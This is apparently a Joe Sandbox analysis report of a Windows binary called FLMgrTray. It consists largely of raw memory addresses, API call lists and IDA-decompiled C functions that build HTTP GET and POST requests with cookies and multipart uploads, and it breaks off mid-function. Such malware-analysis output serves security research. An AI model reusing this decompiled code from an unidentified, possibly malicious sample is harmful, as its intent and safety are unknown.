                                                                                        0x0018719a
                                                                                        0x00187163
                                                                                        0x0018719e
                                                                                        0x0018719e
                                                                                        0x001871a4
                                                                                        0x001871fe
                                                                                        0x001871a6
                                                                                        0x001871ab
                                                                                        0x001871b9
                                                                                        0x001871c7
                                                                                        0x001871cf
                                                                                        0x001871d1
                                                                                        0x001871e7
                                                                                        0x001871f3
                                                                                        0x001871f8
                                                                                        0x001871f8
                                                                                        0x00187204
                                                                                        0x00187204
                                                                                        0x00187205
                                                                                        0x00187205
                                                                                        0x0018720b
                                                                                        0x0018720d
                                                                                        0x00187213
                                                                                        0x00187215
                                                                                        0x0018721b
                                                                                        0x00187220
                                                                                        0x00187220
                                                                                        0x00187222
                                                                                        0x00187223
                                                                                        0x00187223
                                                                                        0x00187227
                                                                                        0x00187229
                                                                                        0x00187230
                                                                                        0x00187230
                                                                                        0x00187232
                                                                                        0x00187235
                                                                                        0x00187235
                                                                                        0x00187237
                                                                                        0x00187238
                                                                                        0x00187238
                                                                                        0x0018723e
                                                                                        0x00187240
                                                                                        0x0018724d
                                                                                        0x00187253
                                                                                        0x00187256
                                                                                        0x00187258
                                                                                        0x0018725a
                                                                                        0x0018725c
                                                                                        0x0018725c
                                                                                        0x0018725d
                                                                                        0x00187260
                                                                                        0x00187260
                                                                                        0x00187262
                                                                                        0x00187263
                                                                                        0x00187263
                                                                                        0x00000000
                                                                                        0x00187260
                                                                                        0x00187258
                                                                                        0x00000000
                                                                                        0x00187267
                                                                                        0x00187267
                                                                                        0x00187267
                                                                                        0x0018726b
                                                                                        0x0018726b
                                                                                        0x00187271
                                                                                        0x00187273
                                                                                        0x00187298
                                                                                        0x00187298
                                                                                        0x0018729e
                                                                                        0x001872a3
                                                                                        0x001872a3
                                                                                        0x001872a5
                                                                                        0x001872a7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001872ad
                                                                                        0x001872af
                                                                                        0x001872c3
                                                                                        0x001872c3
                                                                                        0x001872b1
                                                                                        0x001872b1
                                                                                        0x001872b4
                                                                                        0x001872b7
                                                                                        0x00000000
                                                                                        0x001872b9
                                                                                        0x001872b9
                                                                                        0x001872bc
                                                                                        0x001872bf
                                                                                        0x001872c1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001872c1
                                                                                        0x001872b7
                                                                                        0x00187335
                                                                                        0x00187335
                                                                                        0x0018733d
                                                                                        0x0018733f
                                                                                        0x00187342
                                                                                        0x00187342
                                                                                        0x00187345
                                                                                        0x00187347
                                                                                        0x00187357
                                                                                        0x00187360
                                                                                        0x00187366
                                                                                        0x00187368
                                                                                        0x0018736a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018736c
                                                                                        0x0018736e
                                                                                        0x0018738c
                                                                                        0x0018738c
                                                                                        0x00187370
                                                                                        0x00187376
                                                                                        0x00187379
                                                                                        0x0018737c
                                                                                        0x00000000
                                                                                        0x0018737e
                                                                                        0x0018737e
                                                                                        0x00187385
                                                                                        0x00187388
                                                                                        0x0018738a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018738a
                                                                                        0x0018737c
                                                                                        0x00187395
                                                                                        0x00187395
                                                                                        0x0018739b
                                                                                        0x0018739d
                                                                                        0x001873a7
                                                                                        0x0018739f
                                                                                        0x0018739f
                                                                                        0x0018739f
                                                                                        0x00000000
                                                                                        0x0018739d
                                                                                        0x00187390
                                                                                        0x00187392
                                                                                        0x00187392
                                                                                        0x00000000
                                                                                        0x00187349
                                                                                        0x0018734f
                                                                                        0x0018734f
                                                                                        0x001873ad
                                                                                        0x001873b6
                                                                                        0x00000000
                                                                                        0x001873bc
                                                                                        0x00187330
                                                                                        0x00187332
                                                                                        0x00187332
                                                                                        0x00000000
                                                                                        0x00187275
                                                                                        0x00187275
                                                                                        0x00187277
                                                                                        0x00187280
                                                                                        0x00187286
                                                                                        0x00187289
                                                                                        0x0018728b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018728d
                                                                                        0x00187293
                                                                                        0x00187294
                                                                                        0x00187296
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00187296
                                                                                        0x001872d5
                                                                                        0x001872e3
                                                                                        0x001872e6
                                                                                        0x001872f9
                                                                                        0x0018730e
                                                                                        0x00187310
                                                                                        0x00187316
                                                                                        0x0018731c
                                                                                        0x00187326
                                                                                        0x00187328
                                                                                        0x001873bf
                                                                                        0x001873bf
                                                                                        0x001873c1
                                                                                        0x001873c4
                                                                                        0x001873c4
                                                                                        0x001873c6
                                                                                        0x001873c7
                                                                                        0x001873c7
                                                                                        0x001873cb
                                                                                        0x001873d3
                                                                                        0x001873d5
                                                                                        0x0018742f
                                                                                        0x00187431
                                                                                        0x0018743f
                                                                                        0x001873d7
                                                                                        0x001873d7
                                                                                        0x001873d9
                                                                                        0x001873e0
                                                                                        0x001873e0
                                                                                        0x001873e2
                                                                                        0x001873e3
                                                                                        0x001873e3
                                                                                        0x001873e7
                                                                                        0x001873e7
                                                                                        0x001873e9
                                                                                        0x001873eb
                                                                                        0x001873f0
                                                                                        0x001873f0
                                                                                        0x001873f2
                                                                                        0x001873f3
                                                                                        0x001873f3
                                                                                        0x0018740a
                                                                                        0x00187419
                                                                                        0x00187423
                                                                                        0x00187423
                                                                                        0x00186f4a
                                                                                        0x00186f8c
                                                                                        0x00186f8e
                                                                                        0x00186f91
                                                                                        0x00186f93
                                                                                        0x00186f99
                                                                                        0x00186fa7
                                                                                        0x00186fa7
                                                                                        0x00186f48
                                                                                        0x00186c9e
                                                                                        0x00186c9e
                                                                                        0x00186ca1
                                                                                        0x00000000
                                                                                        0x00186ca7
                                                                                        0x00186cb4
                                                                                        0x00186cba
                                                                                        0x00186cbc
                                                                                        0x00186e8b
                                                                                        0x00186e8b
                                                                                        0x00186e93
                                                                                        0x00186e9a
                                                                                        0x00186e9b
                                                                                        0x00000000
                                                                                        0x00186cc2
                                                                                        0x00186cc2
                                                                                        0x00186cc9
                                                                                        0x00186ddd
                                                                                        0x00186ddf
                                                                                        0x00186de4
                                                                                        0x00186df9
                                                                                        0x00186e00
                                                                                        0x00186e05
                                                                                        0x00186e0a
                                                                                        0x00186e10
                                                                                        0x00186e12
                                                                                        0x00186e15
                                                                                        0x00186e18
                                                                                        0x00186e20
                                                                                        0x00186e20
                                                                                        0x00186e22
                                                                                        0x00186e23
                                                                                        0x00186e23
                                                                                        0x00186e2a
                                                                                        0x00186e33
                                                                                        0x00186e39
                                                                                        0x00186e3b
                                                                                        0x00186e4a
                                                                                        0x00186e50
                                                                                        0x00186e5b
                                                                                        0x00186e69
                                                                                        0x00186e73
                                                                                        0x00186e3d
                                                                                        0x00186e3d
                                                                                        0x00186e43
                                                                                        0x00186e48
                                                                                        0x00186ea0
                                                                                        0x00186ea6
                                                                                        0x00186eac
                                                                                        0x00186eb4
                                                                                        0x00186ebb
                                                                                        0x00186ebc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00186e48
                                                                                        0x00186ccf
                                                                                        0x00186ccf
                                                                                        0x00186cd6
                                                                                        0x00186cdd
                                                                                        0x00186ce4
                                                                                        0x00186ceb
                                                                                        0x00186ceb
                                                                                        0x00186cee
                                                                                        0x00186cfe
                                                                                        0x00186d00
                                                                                        0x00000000
                                                                                        0x00186cf0
                                                                                        0x00186cf0
                                                                                        0x00186cf3
                                                                                        0x00186cf5
                                                                                        0x00186cf7
                                                                                        0x00186d05
                                                                                        0x00186d08
                                                                                        0x00186d08
                                                                                        0x00186cf3
                                                                                        0x00186d0d
                                                                                        0x00186d11
                                                                                        0x00186d14
                                                                                        0x00186d16
                                                                                        0x00186d16
                                                                                        0x00186d19
                                                                                        0x00186d1c
                                                                                        0x00186d21
                                                                                        0x00186d24
                                                                                        0x00186d27
                                                                                        0x00186d2f
                                                                                        0x00186d32
                                                                                        0x00000000
                                                                                        0x00186d34
                                                                                        0x00186d34
                                                                                        0x00000000
                                                                                        0x00186d34
                                                                                        0x00186d29
                                                                                        0x00186d29
                                                                                        0x00186d3b
                                                                                        0x00186d3b
                                                                                        0x00186d3d
                                                                                        0x00186d43
                                                                                        0x00186d49
                                                                                        0x00186d52
                                                                                        0x00186d57
                                                                                        0x00186d5c
                                                                                        0x00186d5f
                                                                                        0x00186d62
                                                                                        0x00186d65
                                                                                        0x00186d65
                                                                                        0x00186d67
                                                                                        0x00186d68
                                                                                        0x00186d68
                                                                                        0x00186d6c
                                                                                        0x00186d6c
                                                                                        0x00186d71
                                                                                        0x00186d76
                                                                                        0x00186d76
                                                                                        0x00186d3b
                                                                                        0x00186d7f
                                                                                        0x00186d84
                                                                                        0x00186d8a
                                                                                        0x00186d8c
                                                                                        0x00186d8e
                                                                                        0x00186dce
                                                                                        0x00186dd1
                                                                                        0x00186dd8
                                                                                        0x00000000
                                                                                        0x00186d90
                                                                                        0x00186d90
                                                                                        0x00186d96
                                                                                        0x00186d96
                                                                                        0x00186d99
                                                                                        0x00186d9d
                                                                                        0x00186da0
                                                                                        0x00186da2
                                                                                        0x00186da2
                                                                                        0x00186da4
                                                                                        0x00186da8
                                                                                        0x00186daa
                                                                                        0x00186daa
                                                                                        0x00186dac
                                                                                        0x00186db4
                                                                                        0x00186dba
                                                                                        0x00186dbc
                                                                                        0x00186dbe
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00186dc4
                                                                                        0x00186dc6
                                                                                        0x00186dcc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00186dcc
                                                                                        0x00186ec1
                                                                                        0x00186ec1
                                                                                        0x00186ec9
                                                                                        0x00186ed0
                                                                                        0x00186ed1
                                                                                        0x00000000
                                                                                        0x00186ed1
                                                                                        0x00186d8e
                                                                                        0x00186cc9
                                                                                        0x00186cbc
                                                                                        0x00186ca1
                                                                                        0x00186c98
                                                                                        0x00186c61
                                                                                        0x00186c58
                                                                                        0x00186a22
                                                                                        0x00186948
                                                                                        0x0018693b
                                                                                        0x00186909
                                                                                        0x001868ee
                                                                                        0x001868e5
                                                                                        0x001868ae
                                                                                        0x00186687
                                                                                        0x0018669c
                                                                                        0x00186807
                                                                                        0x00186807
                                                                                        0x0018680f
                                                                                        0x00186816
                                                                                        0x00186817
                                                                                        0x00000000
                                                                                        0x001866a2
                                                                                        0x001866a9
                                                                                        0x001867bd
                                                                                        0x001867c8
                                                                                        0x001867d0
                                                                                        0x0018681c
                                                                                        0x0018681c
                                                                                        0x00186824
                                                                                        0x0018682b
                                                                                        0x0018682c
                                                                                        0x00000000
                                                                                        0x001867d2
                                                                                        0x001867d7
                                                                                        0x001867ef
                                                                                        0x001867ef
                                                                                        0x001866af
                                                                                        0x001866af
                                                                                        0x001866b6
                                                                                        0x001866bd
                                                                                        0x001866c4
                                                                                        0x001866cb
                                                                                        0x001866ce
                                                                                        0x001866de
                                                                                        0x001866e0
                                                                                        0x00000000
                                                                                        0x001866d0
                                                                                        0x001866d3
                                                                                        0x001866d5
                                                                                        0x001866d7
                                                                                        0x001866e5
                                                                                        0x001866e8
                                                                                        0x001866e8
                                                                                        0x001866d3
                                                                                        0x001866f1
                                                                                        0x001866f4
                                                                                        0x001866f6
                                                                                        0x001866f6
                                                                                        0x001866f9
                                                                                        0x001866fc
                                                                                        0x00186701
                                                                                        0x00186707
                                                                                        0x0018670f
                                                                                        0x00186712
                                                                                        0x00000000
                                                                                        0x00186714
                                                                                        0x00186714
                                                                                        0x00000000
                                                                                        0x00186714
                                                                                        0x00186709
                                                                                        0x00186709
                                                                                        0x0018671b
                                                                                        0x0018671b
                                                                                        0x0018671d
                                                                                        0x00186723
                                                                                        0x00186729
                                                                                        0x00186732
                                                                                        0x00186737
                                                                                        0x0018673c
                                                                                        0x0018673f
                                                                                        0x00186742
                                                                                        0x00186745
                                                                                        0x00186745
                                                                                        0x00186747
                                                                                        0x00186748
                                                                                        0x00186751
                                                                                        0x00186756
                                                                                        0x00186756
                                                                                        0x0018671b
                                                                                        0x0018675f
                                                                                        0x00186764
                                                                                        0x0018676a
                                                                                        0x0018676e
                                                                                        0x001867ae
                                                                                        0x001867ae
                                                                                        0x001867b1
                                                                                        0x001867b8
                                                                                        0x00000000
                                                                                        0x00186770
                                                                                        0x00186770
                                                                                        0x00186776
                                                                                        0x00186776
                                                                                        0x0018677d
                                                                                        0x00186780
                                                                                        0x00186782
                                                                                        0x00186782
                                                                                        0x00186788
                                                                                        0x0018678a
                                                                                        0x0018678a
                                                                                        0x00186794
                                                                                        0x0018679e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001867a4
                                                                                        0x001867ac
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001867ac
                                                                                        0x00186831
                                                                                        0x00186831
                                                                                        0x00186839
                                                                                        0x00186840
                                                                                        0x00186841
                                                                                        0x00000000
                                                                                        0x00186841
                                                                                        0x0018676e
                                                                                        0x001866a9
                                                                                        0x0018669c
                                                                                        0x00186678
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • HttpOpenRequestA.WININET(?,GET,?,HTTP/1.0,?,0019D104,04000000,00000000), ref: 0018666D
                                                                                        • HttpAddRequestHeadersA.WININET(00000000,Accept: */*,0000000D,80000000), ref: 00186694
                                                                                        • InternetSetCookieA.WININET(00000000,?,?), ref: 0018679A
                                                                                        • HttpSendRequestA.WININET(?,00000000,00000000,00000000,00000000), ref: 001867C8
                                                                                        • _CxxThrowException.VCRUNTIME140(?,00199FAC,2C80D730), ref: 00186802
                                                                                        • _CxxThrowException.VCRUNTIME140(00191D30,00199FAC,?,00199FAC,2C80D730), ref: 00186817
                                                                                        • _CxxThrowException.VCRUNTIME140(?,00199FAC,00191D30,00199FAC,?,00199FAC,2C80D730), ref: 0018682C
                                                                                        • _CxxThrowException.VCRUNTIME140(00191D7C,00199FAC,?,00199FAC,00191D30,00199FAC,?,00199FAC,2C80D730), ref: 00186841
                                                                                        • _CxxThrowException.VCRUNTIME140(00191DB0,00199FAC,00191D7C,00199FAC,?,00199FAC,00191D30,00199FAC,?,00199FAC,2C80D730), ref: 00186856
                                                                                        • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.0,?,0019D110,04400040,00000000), ref: 001868DA
                                                                                        • HttpAddRequestHeadersA.WININET(00000000,Accept: */*,0000000D,80000000), ref: 00186901
                                                                                        • HttpAddRequestHeadersA.WININET(?,00191E08,00191E09,10000000), ref: 00186933
                                                                                        • InternetSetCookieA.WININET(00000000,3A657079,3A657091), ref: 00186A5D
                                                                                        • memset.VCRUNTIME140(?,00000000,00000400,?,?), ref: 00186AA6
                                                                                        • HttpAddRequestHeadersA.WININET(?,?,?,10000000), ref: 00186AE9
                                                                                        • HttpSendRequestExA.WININET(?,0019E024,00000000,00000008,00000000), ref: 00186B19
                                                                                        • InternetWriteFile.WININET(?,00000000,00000000,?), ref: 00186B6A
                                                                                        • HttpEndRequestW.WININET(?,00000000,00000008,00000000), ref: 00186B94
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00186BBF
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00186BC6
                                                                                        • _CxxThrowException.VCRUNTIME140(00191D30,00199FAC,2C80D730,?,?), ref: 00186C1A
                                                                                        • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.0,?,0019D108,04400040,00000000), ref: 00186C8D
                                                                                        • HttpAddRequestHeadersA.WININET(00000000,Accept: */*,0000000D,80000000), ref: 00186CB4
                                                                                        • InternetSetCookieA.WININET(00000000,?,?), ref: 00186DBA
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,?,?), ref: 00186DEE
                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 00186DF1
                                                                                        • HttpSendRequestA.WININET(?,00191DC8,?,00000000,?), ref: 00186E33
                                                                                        • GetLastError.KERNEL32(?,?,?), ref: 00186E3D
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 00186E4D
                                                                                        • HeapFree.KERNEL32(00000000,?,?,?), ref: 00186E50
                                                                                        • _CxxThrowException.VCRUNTIME140(?,00199FAC,2C80D730), ref: 00186E86
                                                                                        • _CxxThrowException.VCRUNTIME140(00191D30,00199FAC,?,00199FAC,2C80D730), ref: 00186E9B
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00186EA6
                                                                                        • _CxxThrowException.VCRUNTIME140(?,00199FAC), ref: 00186EBC
                                                                                        • _CxxThrowException.VCRUNTIME140(00191D7C,00199FAC,?,00199FAC), ref: 00186ED1
                                                                                        • _CxxThrowException.VCRUNTIME140(00191DB0,00199FAC,00191D7C,00199FAC,?,00199FAC), ref: 00186EE6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: HttpRequest$ExceptionThrow$Heap$Headers$Internet$CookieFreeOpenProcessSend$AllocErrorFileLastWritememset
                                                                                        • String ID: --MULTI-PARTS-FORM-DATA-BOUNDARY$:%d$Accept: */*$Content-Length: %d$GET$HTTP/1.0$POST$http://$https://
                                                                                        • API String ID: 303545989-826920594
                                                                                        • Opcode ID: 4e0d0171fb4c7c8b4476d04c5a343bd65b6e2aeb102a23bb2a6ae0fbf2bd4f79
                                                                                        • Instruction ID: 6a6b549349a6362ba556434251853cf5a5c81876c4121a9119581c1da764906b
                                                                                        • Opcode Fuzzy Hash: 4e0d0171fb4c7c8b4476d04c5a343bd65b6e2aeb102a23bb2a6ae0fbf2bd4f79
                                                                                        • Instruction Fuzzy Hash: 1342D170A00209EBDF14EF64DD89FAABBB9FF05314F104269F415A7281DB71AA85CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1297 185d80-185e69 call 175ee0 memset * 5 call 186fe0 strncmp 1302 185e6b-185e6e 1297->1302 1303 185e70-185e85 strncmp 1297->1303 1304 185eab-185eb1 1302->1304 1305 185e8c-185ea5 strncmp 1303->1305 1306 185e87-185e8a 1303->1306 1307 185eb4-185eb9 1304->1307 1305->1304 1306->1304 1307->1307 1308 185ebb-185ed5 call 163450 1307->1308 1311 185ef1-185ef3 1308->1311 1312 185ed7-185edd 1308->1312 1314 185f11-185f44 call 185f50 call 1755f4 1311->1314 1315 185ef5-185efe 1311->1315 1313 185ee0-185ee5 1312->1313 1313->1313 1316 185ee7-185ee9 1313->1316 1317 185f00-185f05 1315->1317 1316->1311 1318 185eeb 1316->1318 1317->1317 1319 185f07-185f09 1317->1319 1318->1311 1319->1314 1322 185f0b 1319->1322 1322->1314
                                                                                        C-Code - Quality: 97%
                                                                                        			E00185D80(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, void* _a8, void* _a12, signed int _a16) {
                                                                                        				signed int _v8;
                                                                                        				char _v1032;
                                                                                        				void _v2056;
                                                                                        				void _v3080;
                                                                                        				void _v4104;
                                                                                        				void _v5128;
                                                                                        				intOrPtr* _v5132;
                                                                                        				int _v5136;
                                                                                        				signed int _v5140;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t43;
                                                                                        				int _t64;
                                                                                        				int _t66;
                                                                                        				signed int _t68;
                                                                                        				intOrPtr _t69;
                                                                                        				intOrPtr _t76;
                                                                                        				intOrPtr _t77;
                                                                                        				void* _t79;
                                                                                        				intOrPtr* _t82;
                                                                                        				intOrPtr* _t89;
                                                                                        				intOrPtr* _t91;
                                                                                        				void* _t93;
                                                                                        				void* _t95;
                                                                                        				void* _t96;
                                                                                        				void* _t98;
                                                                                        				signed int _t105;
                                                                                        				signed int _t107;
                                                                                        
                                                                                        				E00175EE0();
                                                                                        				_t43 =  *0x19d05c; // 0x2c80d730
                                                                                        				_v8 = _t43 ^ _t107;
                                                                                        				_t79 = _a12;
                                                                                        				_t98 = _a8;
                                                                                        				_v5140 = _a16;
                                                                                        				_v5132 = __ecx;
                                                                                        				memset( &_v1032, 0, 0x400);
                                                                                        				memset( &_v4104, 0, 0x400);
                                                                                        				memset( &_v3080, 0, 0x400);
                                                                                        				memset( &_v5128, 0, 0x400);
                                                                                        				memset( &_v2056, 0, 0x400);
                                                                                        				_v5136 = 0;
                                                                                        				E00186FE0(_a4,  &_v1032,  &_v4104,  &_v3080,  &_v5128,  &_v5136,  &_v2056);
                                                                                        				_t64 = strncmp( &_v1032, "https", 5);
                                                                                        				if(_t64 != 0) {
                                                                                        					_t66 = strncmp( &_v1032, "http", 4);
                                                                                        					if(_t66 != 0) {
                                                                                        						_t68 = strncmp( &_v1032, "ftp", 3);
                                                                                        						asm("sbb esi, esi");
                                                                                        						_t105 =  ~_t68 & _v5140;
                                                                                        					} else {
                                                                                        						_t23 = _t66 + 1; // 0x1
                                                                                        						_t105 = _t23;
                                                                                        					}
                                                                                        				} else {
                                                                                        					_t21 = _t64 + 2; // 0x2
                                                                                        					_t105 = _t21;
                                                                                        				}
                                                                                        				_t82 =  &_v2056;
                                                                                        				_t93 = _t82 + 1;
                                                                                        				do {
                                                                                        					_t69 =  *_t82;
                                                                                        					_t82 = _t82 + 1;
                                                                                        				} while (_t69 != 0);
                                                                                        				E00163450(_t79, _t93, _t98,  &_v2056, _t82 - _t93);
                                                                                        				if(_t79 != 0) {
                                                                                        					L12:
                                                                                        					if(_t98 != 0) {
                                                                                        						L17:
                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_v5132 + 4))))( &_v5128, _v5136, _t98, _t79, _t105, _v5140); // executed
                                                                                        						return E001755F4(_v8 ^ _t107);
                                                                                        					}
                                                                                        					_t89 =  &_v4104;
                                                                                        					_t95 = _t89 + 1;
                                                                                        					do {
                                                                                        						_t76 =  *_t89;
                                                                                        						_t89 = _t89 + 1;
                                                                                        					} while (_t76 != 0);
                                                                                        					if(_t89 != _t95) {
                                                                                        						_t98 =  &_v4104;
                                                                                        					}
                                                                                        					goto L17;
                                                                                        				}
                                                                                        				_t91 =  &_v3080;
                                                                                        				_t96 = _t91 + 1;
                                                                                        				do {
                                                                                        					_t77 =  *_t91;
                                                                                        					_t91 = _t91 + 1;
                                                                                        				} while (_t77 != 0);
                                                                                        				if(_t91 != _t96) {
                                                                                        					_t79 =  &_v3080;
                                                                                        				}
                                                                                        				goto L12;
                                                                                        			}
































                                                                                        0x00185d88
                                                                                        0x00185d8d
                                                                                        0x00185d94
                                                                                        0x00185d9b
                                                                                        0x00185da3
                                                                                        0x00185dab
                                                                                        0x00185dba
                                                                                        0x00185dc0
                                                                                        0x00185dd3
                                                                                        0x00185de6
                                                                                        0x00185df9
                                                                                        0x00185e0c
                                                                                        0x00185e17
                                                                                        0x00185e46
                                                                                        0x00185e62
                                                                                        0x00185e69
                                                                                        0x00185e7e
                                                                                        0x00185e85
                                                                                        0x00185e9a
                                                                                        0x00185ea3
                                                                                        0x00185ea5
                                                                                        0x00185e87
                                                                                        0x00185e87
                                                                                        0x00185e87
                                                                                        0x00185e87
                                                                                        0x00185e6b
                                                                                        0x00185e6b
                                                                                        0x00185e6b
                                                                                        0x00185e6b
                                                                                        0x00185eab
                                                                                        0x00185eb1
                                                                                        0x00185eb4
                                                                                        0x00185eb4
                                                                                        0x00185eb6
                                                                                        0x00185eb7
                                                                                        0x00185ece
                                                                                        0x00185ed5
                                                                                        0x00185ef1
                                                                                        0x00185ef3
                                                                                        0x00185f11
                                                                                        0x00185f32
                                                                                        0x00185f44
                                                                                        0x00185f44
                                                                                        0x00185ef5
                                                                                        0x00185efb
                                                                                        0x00185f00
                                                                                        0x00185f00
                                                                                        0x00185f02
                                                                                        0x00185f03
                                                                                        0x00185f09
                                                                                        0x00185f0b
                                                                                        0x00185f0b
                                                                                        0x00000000
                                                                                        0x00185f09
                                                                                        0x00185ed7
                                                                                        0x00185edd
                                                                                        0x00185ee0
                                                                                        0x00185ee0
                                                                                        0x00185ee2
                                                                                        0x00185ee3
                                                                                        0x00185ee9
                                                                                        0x00185eeb
                                                                                        0x00185eeb
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • memset.VCRUNTIME140(?,00000000,00000400,?,?,?,?,00183DEE,?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730,?,?,013C1C88), ref: 00185DC0
                                                                                        • memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400,?,?,?,?,00183DEE,?,00000000,00000000,Mozilla/4.0 (compatible; ),2C80D730), ref: 00185DD3
                                                                                        • memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,?,?,?,00183DEE,?,00000000), ref: 00185DE6
                                                                                        • memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,?,?), ref: 00185DF9
                                                                                        • memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?), ref: 00185E0C
                                                                                          • Part of subcall function 00186FE0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00191ED0,00000001,?,?,2C80D730), ref: 0018706D
                                                                                          • Part of subcall function 00186FE0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00191C18,00000001,?,?,2C80D730), ref: 00187098
                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,https,00000005,?,00000000,00000400,?,00000000,00000400,?,00000000,00000400,?,?,?), ref: 00185E62
                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,http,00000004), ref: 00185E7E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$strncmp
                                                                                        • String ID: ftp$http$https
                                                                                        • API String ID: 283058428-33725036
                                                                                        • Opcode ID: 64c3caedf538b1926e14d500512aa427d5f06d6402339aacab2e9668324323aa
                                                                                        • Instruction ID: 6045d05fd216caa5a797e455495b72bf557444c72e77878958adfd54594adcc0
                                                                                        • Opcode Fuzzy Hash: 64c3caedf538b1926e14d500512aa427d5f06d6402339aacab2e9668324323aa
                                                                                        • Instruction Fuzzy Hash: 40518FB6940219AACF25DB64CD41FDAB3BDEF09304F0441D5E708B7151EB71AB8A8FA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1325 164940-16495d 1326 16495f-164962 1325->1326 1327 16496a-164970 1325->1327 1326->1327 1328 164964-164968 1326->1328 1329 164976-164983 1327->1329 1330 164b17-164b1c 1327->1330 1328->1329 1331 164aaa-164ab3 1329->1331 1332 164989-164996 1329->1332 1333 164ab5-164af0 memmove * 3 1331->1333 1334 164af3-164b16 memmove * 2 1331->1334 1335 164b1f-164b24 call 164d00 1332->1335 1336 16499c-1649b0 1332->1336 1334->1330 1338 1649b2-1649b7 1336->1338 1339 1649b9-1649c0 1336->1339 1341 1649c3-1649c9 1338->1341 1339->1341 1342 1649f2-1649f4 1341->1342 1343 1649cb-1649d7 call 175703 1341->1343 1345 1649f6-164a01 call 175703 1342->1345 1346 164a03 1342->1346 1347 1649dc-1649e1 1343->1347 1349 164a05-164a21 memmove 1345->1349 1346->1349 1350 1649e7-1649f0 1347->1350 1351 164aa4 _invalid_parameter_noinfo_noreturn 1347->1351 1353 164a35-164a57 memmove * 2 1349->1353 1354 164a23-164a33 memmove 1349->1354 1350->1349 1351->1331 1355 164a5a-164a5e 1353->1355 1354->1355 1356 164a60-164a6b 1355->1356 1357 164a89-164aa1 1355->1357 1358 164a7f-164a81 call 175733 1356->1358 1359 164a6d-164a7b 1356->1359 1362 164a86 1358->1362 1359->1351 1361 164a7d 1359->1361 1361->1358 1362->1357
                                                                                        C-Code - Quality: 61%
                                                                                        			E00164940(void* __ebx, void** __ecx, void* __edi, void* __esi, void* _a4, void* _a8, int _a12, char _a15) {
                                                                                        				void* _v8;
                                                                                        				void* _v12;
                                                                                        				void* _v16;
                                                                                        				void* _t43;
                                                                                        				void* _t71;
                                                                                        				void* _t75;
                                                                                        				void* _t81;
